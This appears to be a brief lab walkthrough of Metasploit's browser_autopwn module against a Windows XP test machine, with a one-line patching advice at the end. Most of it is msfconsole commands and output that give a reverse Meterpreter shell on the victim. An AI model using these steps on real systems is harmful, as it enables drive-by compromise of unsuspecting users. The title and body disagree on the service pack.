Metasploit Browser Autopwn

Metasploit Browser Autopwn – Windows XP SP2

July 01, 2016 — metalkey

Attacker: Kali Linux
Victim: Windows XP SP3 (Java 6u25, IE6)

Step 1 – Starting the Browser Autopwn Server

Run msfconsole, load the browser_autopwn module and set all required options.




root@kali:~$ msfconsole

msf > use auxiliary/server/browser_autopwn

msf auxiliary(browser_autopwn) > set LHOST 192.168.1.12

msf auxiliary(browser_autopwn) > set SRVPORT 80

msf auxiliary(browser_autopwn) > set URIPATH /

msf auxiliary(browser_autopwn) > run



[*] Starting exploit modules on host 192.168.1.12...

[*] Server started.

The Browser Autopwn Server is now running and waiting for victims to browse to the url http://192.168.1.12

Step 2 – Pwning the Victim

On your Windows XP test machine (victim), browse to http://192.168.1.12.
This will trigger the browser_autopwn module to serve the appropriate exploit and launch a meterpreter session.




[*] Meterpreter session 1 opened (192.168.1.12:7777 -> 

192.168.1.13:1045) at 2015-07-25 05:08:06 -0400

...

msf auxiliary(browser_autopwn) > sessions -i 1

[*] Starting interaction with 1...meterpreter > shell

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\IEUser\Desktop>echo %USERNAME%

Victim



C:\Documents and Settings\IEUser\Desktop>ipconfig

Windows IP Configuration



Ethernet adapter Local Area Connection:



Connection-specific DNS Suffix . : Home

IP Address. . . . . . . . . . . . : 192.168.1.13

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1



C:\Documents and Settings\IEUser\Desktop>

You now have shell access to the Windows XP SP3 Victim with the same access as the user who navigated to the exploit url.

Solution

Keep your software fully updated (e.g. Windows, Web Browsers, Java, etc…) and uninstall unused applications.

Tags: metasploit